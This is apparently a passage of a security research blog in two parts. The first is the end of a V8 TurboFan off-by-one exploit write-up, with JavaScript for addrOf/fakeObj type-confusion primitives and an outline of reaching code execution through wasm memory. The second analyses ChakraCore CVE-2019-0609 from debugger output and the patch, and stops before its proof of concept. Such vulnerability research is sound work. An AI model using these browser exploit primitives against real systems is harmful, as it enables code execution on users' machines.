<span class="w"> </span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">o</span><span class="p">.</span><span class="nx">x</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// after escape analysis</span>
<span class="kd">function</span><span class="w"> </span><span class="nx">foo</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="mf">1</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>Because the escape analysis runs behind the <code>LoadElimination</code> and <code>MachineOperatorReducer</code>, we can put a constant into an unescaped object to avoid the constant folding.</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span><span class="w"> </span><span class="nx">opt</span><span class="p">(){</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="nx">arr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="mf">1.1</span><span class="p">,</span><span class="w"> </span><span class="mf">2</span><span class="p">,</span><span class="w"> </span><span class="mf">3</span><span class="p">,</span><span class="w"> </span><span class="mf">5</span><span class="p">];</span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="nx">o</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="nx">x</span><span class="o">:</span><span class="w"> </span><span class="mf">4</span><span class="p">};</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">arr</span><span class="p">[</span><span class="nx">o</span><span class="p">.</span><span class="nx">x</span><span class="p">];</span>
<span class="p">}</span>
<span class="p">...</span>
<span class="c1">// output</span>
<span class="nx">$</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">d8</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="nx">test</span><span class="p">.</span><span class="nx">js</span>
<span class="nx">$</span><span class="w"> </span><span class="mf">1.99567061273097e-310</span>
</code></pre></div>
<p>Now, we get an array off-by-one vulnerability successfully.</p>
<h3>Exploiting the Off-By-One</h3>
<center>
<img style="border-radius: 0.3125em;
box-shadow: 0 2px 4px 0 rgba(34,36,38,.12),0 2px 10px 0 rgba(34,36,38,.08);"
src="https://i.imgur.com/4j64gmd.png" width = "500">
<br>
<div style="color:orange; border-bottom: 1px solid #d9d9d9;
display: inline-block;
color: #999;
padding: 2px;"><i>The layout of JS objects in V8</i></div>
</center>
<p><br></p>
<p>In <code>V8</code>, the type of objects is determined by the <code>Map</code><sup id="fnref:3"><a class="footnote-ref" href="#fn:3">4</a></sup>. As a result, if we can replace a double array's map with a var array, a type confusion array cound be constructed.</p>
<p>Because <code>map</code> is the first member of the JS object, by manipulating the heap fengshui, we make two adjacent arraies and try to use the first one to read or write the second one's map. </p>
<center>
<img style="border-radius: 0.3125em;
box-shadow: 0 2px 4px 0 rgba(34,36,38,.12),0 2px 10px 0 rgba(34,36,38,.08);"
src="https://i.imgur.com/bsVawl3.png" width = "500">
<br>
<div style="color:orange; border-bottom: 1px solid #d9d9d9;
display: inline-block;
color: #999;
padding: 2px;"><i>Faking objects by leveraging the Off-By-One bug</i></div>
</center>
<p><br></p>
<p>Now the baisc idea is that we can construct two OOB array, the first is used to leak information, and the second one is used to fake objects. The firgue shows how to fake objects.</p>
<h3>Heap Feng Shui</h3>
<center>
<img style="border-radius: 0.3125em;
box-shadow: 0 2px 4px 0 rgba(34,36,38,.12),0 2px 10px 0 rgba(34,36,38,.08);"
src="https://i.imgur.com/NuJ1aBZ.png" width = "250x">
<br>
<div style="color:orange; border-bottom: 1px solid #d9d9d9;
display: inline-block;
color: #999;
padding: 2px;"><i>The layout of JS array while debugging</i></div>
</center>
<p><br></p>
<p>Unfortunately, after investigating, we noticed the layout of heap is very weird. The backstore always place in the front of the array header. Therefore, we can only read the array's own map object. </p>
<p>That's fine for leaking double array's map. However, we can not get var array's map using this way, because the map retrieved is encoded as a format of object; and thus, we cannot know the address of it.</p>
<p>Fortunately, <code>v8</code> uses an idependent heap to store <code>Map</code> objects. the memory layout in this region is relatively stable. Therefore, we can use the address of double map to caculate the jsvar map by leveraing a fixed offset.</p>
<h3>Constructing Stable Exploitation Primitives</h3>
<p>Originally, We use the following codes to leak information and fake objects.</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span><span class="w"> </span><span class="nx">lkrefs</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[];</span>
<span class="kd">function</span><span class="w"> </span><span class="nx">leaker</span><span class="p">(</span><span class="nx">obj</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">var</span><span class="w"> </span><span class="nx">a</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="nx">obj</span><span class="p">,</span><span class="w"> </span><span class="nx">obj</span><span class="p">,</span><span class="w"> </span><span class="nx">obj</span><span class="p">,</span><span class="w"> </span><span class="nx">obj</span><span class="p">];</span>
<span class="w"> </span><span class="nx">lkrefs</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">a</span><span class="p">);</span>
<span class="w"> </span><span class="kd">var</span><span class="w"> </span><span class="nx">o</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="nx">a</span><span class="o">:</span><span class="w"> </span><span class="mf">4</span><span class="p">};</span>
<span class="w"> </span><span class="nx">a</span><span class="p">[</span><span class="nx">o</span><span class="p">.</span><span class="nx">a</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="nx">double_map</span><span class="p">];</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">a</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span><span class="w"> </span><span class="nx">addrOf</span><span class="p">(</span><span class="nx">obj</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">for</span><span class="p">(</span><span class="kd">var</span><span class="w"> </span><span class="nx">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mf">0</span><span class="p">;</span><span class="w"> </span><span class="nx">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mf">12000</span><span class="p">;</span><span class="w"> </span><span class="nx">i</span><span class="o">++</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">var</span><span class="w"> </span><span class="nx">ppp</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nx">leaker</span><span class="p">(</span><span class="nx">obj</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">ppp</span><span class="p">[</span><span class="mf">0</span><span class="p">];</span>
<span class="p">}</span>
<span class="kd">function</span><span class="w"> </span><span class="nx">faker</span><span class="p">(</span><span class="nx">addr</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">var</span><span class="w"> </span><span class="nx">a</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="nx">addr</span><span class="p">,</span><span class="w"> </span><span class="nx">addr</span><span class="p">,</span><span class="w"> </span><span class="nx">addr</span><span class="p">,</span><span class="w"> </span><span class="nx">addr</span><span class="p">];</span>
<span class="w"> </span><span class="nx">lkrefs</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">a</span><span class="p">);</span>
<span class="w"> </span><span class="kd">var</span><span class="w"> </span><span class="nx">o</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="nx">a</span><span class="o">:</span><span class="w"> </span><span class="mf">4</span><span class="p">};</span>
<span class="w"> </span><span class="nx">a</span><span class="p">[</span><span class="nx">o</span><span class="p">.</span><span class="nx">a</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="nx">var_array_map</span><span class="p">];</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">a</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span><span class="w"> </span><span class="nx">fakeObj</span><span class="p">(</span><span class="nx">addr</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="k">for</span><span class="p">(</span><span class="kd">var</span><span class="w"> </span><span class="nx">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mf">0</span><span class="p">;</span><span class="w"> </span><span class="nx">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mf">12000</span><span class="p">;</span><span class="w"> </span><span class="nx">i</span><span class="o">++</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">var</span><span class="w"> </span><span class="nx">ppp</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nx">faker</span><span class="p">(</span><span class="nx">addr</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">ppp</span><span class="p">[</span><span class="mf">0</span><span class="p">];</span>
<span class="p">}</span>
</code></pre></div>
<p>However, it is very unstable. If we use this primitive too many times, it triggers garbage collection. The fake objects will be corrupted, and the process will crash.</p>
<p>Hence, we use a fake array to avoid it and get reusebale <code>addrOf</code> and <code>fakeObj</code> primitive.</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span><span class="w"> </span><span class="nx">o</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">a</span><span class="o">:</span><span class="w"> </span><span class="mf">0.0</span><span class="p">,</span>
<span class="w"> </span><span class="nx">b</span><span class="o">:</span><span class="w"> </span><span class="p">[</span><span class="nx">map</span><span class="p">],</span>
<span class="w"> </span><span class="nx">c</span><span class="o">:</span><span class="w"> </span><span class="p">{},</span>
<span class="w"> </span><span class="nx">d</span><span class="o">:</span><span class="w"> </span><span class="nx">addrOf</span><span class="p">(</span><span class="nx">o</span><span class="p">),</span>
<span class="w"> </span><span class="nx">e</span><span class="o">:</span><span class="w"> </span><span class="mh">0x0000100400000000</span><span class="p">,</span><span class="w"> </span><span class="c1">//length</span>
<span class="w"> </span><span class="nx">f</span><span class="o">:</span><span class="w"> </span><span class="p">{}</span>
<span class="p">}</span>
<span class="nx">faked</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nx">addrOf</span><span class="p">(</span><span class="nx">o</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mh">0x20</span><span class="p">;</span>
<span class="kd">var</span><span class="w"> </span><span class="nx">fake_arr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nx">fake_obj</span><span class="p">(</span><span class="nx">faked</span><span class="p">.</span><span class="nx">asDouble</span><span class="p">());</span>
<span class="c1">// we create a stable primitive</span>
<span class="kd">function</span><span class="w"> </span><span class="nx">addrof</span><span class="p">(</span><span class="nx">obj</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">o</span><span class="p">.</span><span class="nx">d</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nx">addr_o</span><span class="p">.</span><span class="nx">asDouble</span><span class="p">();</span>
<span class="w"> </span><span class="nx">o</span><span class="p">.</span><span class="nx">b</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="kd">var</span><span class="w"> </span><span class="nx">map</span><span class="p">];</span>
<span class="w"> </span><span class="nx">fake_arr</span><span class="p">[</span><span class="mf">7</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nx">obj</span><span class="p">;</span>
<span class="w"> </span><span class="nx">o</span><span class="p">.</span><span class="nx">b</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="kr">double</span><span class="w"> </span><span class="nx">map</span><span class="p">];</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">fake_arr</span><span class="p">[</span><span class="mf">7</span><span class="p">];</span>
<span class="p">}</span>
<span class="kd">function</span><span class="w"> </span><span class="nx">fakeobj</span><span class="p">(</span><span class="nx">addr</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">o</span><span class="p">.</span><span class="nx">d</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nx">addr_o</span><span class="p">.</span><span class="nx">asDouble</span><span class="p">();</span>
<span class="w"> </span><span class="nx">o</span><span class="p">.</span><span class="nx">b</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="kr">double</span><span class="w"> </span><span class="nx">map</span><span class="p">];</span>
<span class="w"> </span><span class="nx">fake_arr</span><span class="p">[</span><span class="mf">7</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nx">addr</span><span class="p">;</span>
<span class="w"> </span><span class="nx">o</span><span class="p">.</span><span class="nx">b</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="kd">var</span><span class="w"> </span><span class="nx">map</span><span class="p">];</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">fake_arr</span><span class="p">[</span><span class="mf">7</span><span class="p">];</span>
<span class="p">}</span>
</code></pre></div>
<h3>Code Execution</h3>
<p>With stable and reusable <code>addrOf</code> and <code>fakeObj</code> primitive, now the exploitation is quite easier.</p>
<p>We simply follow the well-known tricks to get arbitrary address read/write primitives and overwrite the memory of wasm code to get code exection<sup id="fnref:4"><a class="footnote-ref" href="#fn:4">5</a></sup>.</p>
<h3>Demo</h3>
<p><a href="https://www.youtube.com/watch?v=5MUFkH1s8LE"><img alt="IMAGE ALT TEXT HERE" src="http://img.youtube.com/vi/5MUFkH1s8LE/0.jpg"></a></p>
<h3>References</h3>
<div class="footnote">
<hr>
<ol>
<li id="fn:0">
<p><a href="https://doar-e.github.io/blog/2019/05/09/circumventing-chromes-hardening-of-typer-bugs/">Circumventing Chrome's hardening of typer bugs</a> <a class="footnote-backref" href="#fnref:0" title="Jump back to footnote 1 in the text">↩</a></p>
</li>
<li id="fn:1">
<p><a href="https://doar-e.github.io/blog/2019/01/28/introduction-to-turbofan/#preparing-turbolizer">Introduction to TurboFan</a> <a class="footnote-backref" href="#fnref:1" title="Jump back to footnote 2 in the text">↩</a></p>
</li>
<li id="fn:2">
<p><a href="https://abiondo.me/2019/01/02/exploiting-math-expm1-v8/">Exploiting the Math.expm1 typing bug in V8</a> <a class="footnote-backref" href="#fnref:2" title="Jump back to footnote 3 in the text">↩</a></p>
</li>
<li id="fn:3">
<p><a href="https://jayconrod.com/posts/52/a-tour-of-v8-object-representation">A tour of V8: object representation</a> <a class="footnote-backref" href="#fnref:3" title="Jump back to footnote 4 in the text">↩</a></p>
</li>
<li id="fn:4">
<p><a href="https://www.jaybosamiya.com/blog/2019/01/02/krautflare/">Exploiting Chrome V8: Krautflare (35C3 CTF 2018)</a> <a class="footnote-backref" href="#fnref:4" title="Jump back to footnote 5 in the text">↩</a></p>
</li>
</ol>
</div>Analysis of a use-after-unmap vulnerability in Edge: CVE-2019-06092019-06-29T00:00:00+02:002019-06-29T00:00:00+02:00Soyeon Parktag:gts3.org,2019-06-29:/2019/cve-2019-0609.html<p>An analysis of an interesting vulnerability in Microsoft Edge</p><h2>Introduction</h2>
<p>If someone wants to view a web page with his phone or computer, he will use a web browser.
You also might be reading this article with a web browser. All the commodity web browsers in the world (i.e., Microsoft Edge, Apple Safari, Google Chrome, and Mozilla Firefox) implement their own JavaScript engines to support client-side scripting language for dynamic interaction with a client. That is the reason why the JavaScript engine is one of the most popular targets of both hackers and security researchers.</p>
<p>In this post, we introduce an interesting security vulnerability in ChakraCore (JS engine for Edge) we found
during our research, CVE-2019-0609. Although the root cause of this bug is not so complicated, it was located quiet deeply unlike other interpreter bugs. Thus, this bug was hard to catch and long-lasting. We guess this is the reason why Microsoft paid the maximum amount of payment to us for the bug bounty.</p>
<h2>Analyzing CVE-2019-0609, a use-after-unmap vulnerability</h2>
<h3>The first insight</h3>
<p>Let's start with the assertion hit by the PoC in debug build.</p>
<div class="highlight"><pre><span></span><code><span class="n">ASSERTION</span><span class="w"> </span><span class="mi">264714</span><span class="o">:</span><span class="w"> </span><span class="p">(</span><span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">soyeon</span><span class="o">/</span><span class="n">jsfuzz</span><span class="o">/</span><span class="n">js</span><span class="o">-</span><span class="n">static</span><span class="o">/</span><span class="n">engines</span><span class="o">/</span><span class="n">chakracore</span><span class="o">-</span><span class="mf">1.11.3</span><span class="o">/</span><span class="n">lib</span><span class="o">/</span><span class="n">Runtime</span><span class="o">/</span><span class="nf">Library</span><span class="o">/</span><span class="n">StackScriptFunction</span><span class="p">.</span><span class="n">cpp</span><span class="p">,</span><span class="w"> </span><span class="n">line</span><span class="w"> </span><span class="mi">249</span><span class="p">)</span><span class="w"> </span><span class="n">stackFunction</span><span class="o">-></span><span class="n">boxedScriptFunction</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">boxedFunction</span>
<span class="w"> </span><span class="kr">Failure</span><span class="o">:</span><span class="w"> </span><span class="p">(</span><span class="n">stackFunction</span><span class="o">-></span><span class="n">boxedScriptFunction</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">boxedFunction</span><span class="p">)</span>
<span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="mi">264714</span><span class="w"> </span><span class="n">illegal</span><span class="w"> </span><span class="n">hardware</span><span class="w"> </span><span class="n">instruction</span><span class="w"> </span><span class="o">~/</span><span class="n">jsfuzz</span><span class="o">/</span><span class="n">js</span><span class="o">-</span><span class="n">static</span><span class="o">/</span><span class="n">engines</span><span class="o">/</span><span class="n">chakracore</span><span class="o">-</span><span class="mf">1.11.3</span><span class="o">/</span><span class="n">out</span><span class="o">/</span><span class="n">Debug</span><span class="o">/</span><span class="n">ch</span><span class="w"> </span><span class="mf">35977387.</span><span class="n">js</span>
</code></pre></div>
<p>From the assertion, we can infer that the PoC has hit an issue while boxing a JavaScript function.
No doubt you will be curious about what boxing is, as I did. So, what is boxing in JavaScript?</p>
<h3>Boxing in JavaScript</h3>
<p>If you declare an object such as a Number or a Function inside the global code or a function, they will be allocated on the stack normally. However, they should be located on the heap for some case, such as referencing same objects with different pointers or scope escaping of an object. For example, if a function allocated on the stack is returned, the function should be boxed to avoid scope escaping. This can happen in JavaScript because a function is a first-class object in JavaScript.</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span><span class="w"> </span><span class="nx">test</span><span class="p">()</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="kd">function</span><span class="w"> </span><span class="nx">stackFun</span><span class="p">(){}</span>
<span class="w"> </span><span class="kd">function</span><span class="w"> </span><span class="nx">heapFun</span><span class="p">(){</span><span class="nx">print</span><span class="p">(</span><span class="s2">"hi!"</span><span class="p">);}</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">heapFun</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">test</span><span class="p">()();</span>
<span class="c1">// output : hi!</span>
</code></pre></div>
<p>In the above code, <code>function stackFun</code> and <code>heapFun</code> would be located on the stack when they are declared. Further, the <code>function heapFun</code> should be moved to the heap to avoid pointing the address on the stack of <code>function test</code>, as it is returned to the outside of <code>function test</code>. The behavior that the JS engine moves the object to heap from stack, is called boxing. It is similar to the concept of boxing in Java. </p>
<h3>What makes the assertion</h3>
<p>Based on the concept of boxing, we can infer that a <code>scriptFunction</code> needs boxing but it failed for some reason. For details, let's take a look at the code around the assertion on <code>StackScriptFunction::BoxState::Box</code> in <code>lib/Runtime/Library/StackScriptFunction.cpp</code>. </p>
<div class="highlight"><pre><span></span><code><span class="mi">247</span><span class="w"> </span><span class="n">StackScriptFunction</span><span class="w"> </span><span class="o">*</span><span class="n">stackFunction</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">interpreterFrame</span><span class="o">-></span><span class="n">GetStackNestedFunction</span><span class="p">(</span><span class="n">i</span><span class="p">);</span><span class="w"> </span>
<span class="mi">248</span><span class="w"> </span><span class="n">ScriptFunction</span><span class="w"> </span><span class="o">*</span><span class="n">boxedFunction</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">this</span><span class="o">-></span><span class="n">BoxStackFunction</span><span class="p">(</span><span class="n">stackFunction</span><span class="p">);</span><span class="w"> </span>
<span class="mi">249</span><span class="w"> </span><span class="n">Assert</span><span class="p">(</span><span class="n">stackFunction</span><span class="o">-></span><span class="n">boxedScriptFunction</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">boxedFunction</span><span class="p">);</span><span class="w"> </span>
<span class="mi">250</span><span class="w"> </span><span class="n">this</span><span class="o">-></span><span class="n">UpdateFrameDisplay</span><span class="p">(</span><span class="n">stackFunction</span><span class="p">);</span>
</code></pre></div>
<p>In the above code, it tries to box a <code>stackFunction</code> for some reason, and check whether or not the function is boxed through the assertion. However, the reached assertion shows that it is not really boxed. With gdb, we checked the <code>boxedFunction</code> still indicates <code>stackFunction</code> on the stack, and <code>boxedScriptFunction</code> is nullptr. In normal case, it should points the<code>boxedFunction</code>. </p>
<div class="highlight"><pre><span></span><code><span class="nt">Stopped</span><span class="w"> </span><span class="nt">reason</span><span class="o">:</span><span class="w"> </span><span class="nt">SIGILL</span>
<span class="nt">0x0000555558a9be2f</span><span class="w"> </span><span class="nt">in</span><span class="w"> </span><span class="nt">Js</span><span class="p">::</span><span class="nd">StackScriptFunction</span><span class="p">::</span><span class="nd">BoxState</span><span class="p">::</span><span class="nd">Box</span><span class="w"> </span><span class="o">(</span><span class="nt">this</span><span class="o">=</span><span class="nt">0x7ffffffe2540</span><span class="o">)</span><span class="w"> </span><span class="nt">at</span><span class="w"> </span><span class="o">/</span><span class="nt">home</span><span class="o">/</span><span class="nt">soyeon</span><span class="o">/</span><span class="nt">jsfuzz</span><span class="o">/</span><span class="nt">js-static</span><span class="o">/</span><span class="nt">engines</span><span class="o">/</span><span class="nt">chakracore-1</span><span class="p">.</span><span class="nc">11</span><span class="p">.</span><span class="nc">5</span><span class="o">/</span><span class="nt">lib</span><span class="o">/</span><span class="nt">Runtime</span><span class="o">/</span><span class="nt">Library</span><span class="o">/</span><span class="nt">StackScriptFunction</span><span class="p">.</span><span class="nc">cpp</span><span class="p">:</span><span class="nd">249</span>
<span class="nt">249</span><span class="w"> </span><span class="nt">Assert</span><span class="o">(</span><span class="nt">stackFunction-</span><span class="o">></span><span class="nt">boxedScriptFunction</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nt">boxedFunction</span><span class="o">);</span>
<span class="o">$</span><span class="w"> </span><span class="nt">print</span><span class="w"> </span><span class="nt">boxedFunction</span>
<span class="o">$</span><span class="nt">1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">(</span><span class="nt">Js</span><span class="p">::</span><span class="nd">ScriptFunction</span><span class="w"> </span><span class="o">*)</span><span class="w"> </span><span class="nt">0x7ff7f024fff8</span>
<span class="o">$</span><span class="w"> </span><span class="nt">print</span><span class="w"> </span><span class="nt">stackFunction</span>
<span class="o">$</span><span class="nt">2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">(</span><span class="nt">Js</span><span class="p">::</span><span class="nd">StackScriptFunction</span><span class="w"> </span><span class="o">*)</span><span class="w"> </span><span class="nt">0x7ff7f024fff8</span>
<span class="o">$</span><span class="w"> </span><span class="nt">print</span><span class="w"> </span><span class="nt">stackFunction-</span><span class="o">></span><span class="nt">boxedScriptFunction</span>
<span class="o">$</span><span class="nt">3</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">(</span><span class="nt">Js</span><span class="p">::</span><span class="nd">ScriptFunction</span><span class="w"> </span><span class="o">*)</span><span class="w"> </span><span class="nt">0x0</span>
</code></pre></div>
<p>Something went wrong! We should check what really happened in <code>BoxStackFunction</code>. </p>
<h3>Why boxing stack function is failed</h3>
<p>This is the code snippet of the <code>StackScriptFunction::BoxState::BoxStackFunction</code>.</p>
<div class="highlight"><pre><span></span><code><span class="mi">710</span><span class="w"> </span><span class="n">ScriptFunction</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">StackScriptFunction</span><span class="o">::</span><span class="n">BoxState</span><span class="o">::</span><span class="n">BoxStackFunction</span><span class="p">(</span><span class="n">ScriptFunction</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">scriptFunction</span><span class="p">)</span>
<span class="mi">711</span><span class="w"> </span><span class="p">{</span>
<span class="mi">712</span><span class="w"> </span><span class="c1">// Box the frame display first, which may in turn box the function</span>
<span class="mi">713</span><span class="w"> </span><span class="n">FrameDisplay</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">frameDisplay</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">scriptFunction</span><span class="o">-></span><span class="n">GetEnvironment</span><span class="p">();</span>
<span class="mi">714</span><span class="w"> </span><span class="n">FrameDisplay</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">boxedFrameDisplay</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">BoxFrameDisplay</span><span class="p">(</span><span class="n">frameDisplay</span><span class="p">);</span>
<span class="mi">715</span>
<span class="mi">716</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">ThreadContext</span><span class="o">::</span><span class="n">IsOnStack</span><span class="p">(</span><span class="n">scriptFunction</span><span class="p">))</span>
<span class="mi">717</span><span class="w"> </span><span class="p">{</span>
<span class="mi">718</span><span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">scriptFunction</span><span class="p">;</span>
<span class="mi">719</span><span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="p">...</span>
<span class="mi">748</span><span class="w"> </span><span class="n">boxedFunction</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ScriptFunction</span><span class="o">::</span><span class="n">OP_NewScFunc</span><span class="p">(</span><span class="n">boxedFrameDisplay</span><span class="p">,</span>
<span class="mi">749</span><span class="w"> </span><span class="n">reinterpret_cast</span><span class="o"><</span><span class="n">FunctionInfoPtrPtr</span><span class="o">></span><span class="p">(</span><span class="o">&</span><span class="n">functionInfo</span><span class="p">));</span>
<span class="mi">750</span><span class="w"> </span><span class="n">stackFunction</span><span class="o">-></span><span class="n">boxedScriptFunction</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">boxedFunction</span><span class="p">;</span>
</code></pre></div>
<p>If the <code>scriptFunction</code> is not on the stack, the function does not box the <code>scriptFunction</code>, but just returns the <code>scriptFunction</code>. Probably, this is because the <code>BoxStackFunction</code> wants to avoid boxing a <code>scriptFunction</code> again, which is already boxed and does not exist on the stack. However, it should be located on the stack, as it was <code>StackScriptFunction</code>. This made us suspect the process of the stack variable allocation.</p>
<p>We found a hint in <code>lib/Runtime/Language/InterpreterStackFrame.cpp: Var InterpreterStackFrame::InterpreterHelper</code>. </p>
<div class="highlight"><pre><span></span><code><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="nx">varAllocCount</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="nx">InterpreterStackFrame</span><span class="o">::</span><span class="nx">LocalsThreshold</span><span class="p">)</span><span class="w"> </span>
</code></pre></div>
<p>While allocating the stack for a function, the engine first checks if the space of the local variables exceeds the threshold (<code>InterpreterStackFrame::LocalsThreshold</code>). If so, the engine will allocate a private arena as the stack instead of using the existing native stack. However, the scope analysis which is done by <code>ThreadContext::IsOnStack</code> afterward, forgets to treat this private arena as a stack frame as well. Therefore, the stack function on the private arena will not be boxed and escape the original scope.</p>
<p>After the function, which has a private arena as its stack, is destructed, the stack will be also un-mapped. However, the non-boxed function still points to the stale stack space, which eventually results in a use-after-unmap vulnerability.</p>
<h2>Patch analysis</h2>
<p>This is the patch for CVE-2019-0609 released in ChakraCore 1.11.7.</p>
<div class="highlight"><pre><span></span><code><span class="o">+</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">stackVarAllocCount</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span>
<span class="o">+</span><span class="w"> </span><span class="p">{</span>
<span class="o">+</span><span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">stackVarSizeInBytes</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">stackVarAllocCount</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">Var</span><span class="p">);</span>
<span class="o">+</span><span class="w"> </span><span class="n">PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME</span><span class="p">(</span><span class="n">GetScriptContext</span><span class="p">(),</span><span class="w"> </span><span class="n">Js</span><span class="o">::</span><span class="n">Constants</span><span class="o">::</span><span class="n">MinStackInterpreter</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">stackVarSizeInBytes</span><span class="p">);</span>
<span class="o">+</span><span class="w"> </span><span class="n">stackAllocation</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">Var</span><span class="o">*</span><span class="p">)</span><span class="n">_alloca</span><span class="p">(</span><span class="n">stackVarSizeInBytes</span><span class="p">);</span>
<span class="o">+</span><span class="w"> </span><span class="p">}</span>
</code></pre></div>
<p>In the patch, the engine first calculates <code>stackVarAllocCount</code> as the number of <code>stackScriptFunction</code> whether it is necessary to box or not. Then, it moves the <code>stackScriptFunctions</code> to the heap through <code>_alloca</code>.</p>
<h2>Proof-of-Concept</h2>
<p>Here is the PoC of CVE-2019-0609. The [big-size object] should be a large object literal that has an enough number of initialized members to exceed the threshold to allocate a private arena as the function stack.</p>
